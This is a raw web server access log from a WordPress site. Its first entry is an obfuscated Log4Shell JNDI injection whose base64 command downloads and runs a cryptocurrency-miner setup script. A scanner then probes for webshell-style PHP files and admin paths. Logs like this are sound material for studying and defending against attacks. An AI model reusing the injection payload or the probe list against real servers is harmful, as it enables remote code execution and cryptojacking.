80.75.212.83 - - [09/Oct/2025:20:18:46 +0800] "GET /t%28%27%7B%7Benv:NaN:-j%7Dndi%7Benv:NaN:-:%7D%7Benv:NaN:-l%7Ddap%7Benv:NaN:-:%7D/45.38.42.81:3389/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg== HTTP/1.1" 404 31381 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.38.42.81:3389/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.38.42.81:3389/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')"
36.133.115.36 - - [09/Oct/2025:20:26:37 +0800] "POST /wp-cron.php?doing_wp_cron=1760012797.6990790367126464843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.92 - - [09/Oct/2025:20:26:38 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Oct/2025:20:33:11 +0800] "POST /wp-cron.php?doing_wp_cron=1760013191.8882360458374023437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
35.233.76.131 - - [09/Oct/2025:20:33:11 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.5"
20.169.27.58 - - [09/Oct/2025:20:37:21 +0800] "GET /aa.php HTTP/1.1" 404 27 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:21 +0800] "GET /about.php HTTP/1.1" 404 27 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:22 +0800] "GET /admin.php HTTP/1.1" 404 27 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:22 +0800] "GET /akc.php HTTP/1.1" 404 27 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:22 +0800] "GET /alfa.php HTTP/1.1" 404 27 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:22 +0800] "GET /asasx.php HTTP/1.1" 404 27 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:22 +0800] "GET /atomlib.php HTTP/1.1" 404 27 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:23 +0800] "GET /autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:23 +0800] "GET /autoload_classmap/function.php HTTP/1.1" 404 27 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:23 +0800] "GET /abcd.php HTTP/1.1" 404 27 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:23 +0800] "GET /file.php HTTP/1.1" 404 27 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:24 +0800] "GET /wp-includes/IXR/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:24 +0800] "GET /wp.php HTTP/1.1" 404 27 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:24 +0800] "GET /wp-admin/css/colors/blue/atomlib.php HTTP/1.1" 404 27 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:24 +0800] "GET /wp-admin/css/colors/index.php HTTP/1.1" 404 27 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:24 +0800] "GET /wp-admin/images/admin.php HTTP/1.1" 404 27 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:25 +0800] "GET /wp-admin/images/index.php HTTP/1.1" 404 27 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:25 +0800] "GET /wp-admin/js/ HTTP/1.1" 403 146 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:25 +0800] "GET /wp-admin/js/widgets/ HTTP/1.1" 403 146 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:25 +0800] "GET /wp-admin/js/widgets/about.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [09/Oct/2025:20:37:26 +0800] "POST /wp-cron.php?doing_wp_cron=1760013446.6216468811035156250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.169.27.58 - - [09/Oct/2025:20:37:26 +0800] "GET /wp-admin/network/ HTTP/1.1" 302 5 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:27 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Fnetwork%2F&reauth=1 HTTP/1.1" 200 8680 "-" "-"
20.169.27.58 - - [09/Oct/2025:20:37:27 +0800] "GET /wp-admin/network/chosen.php HTTP/1.1" 404 27 "-" "-"
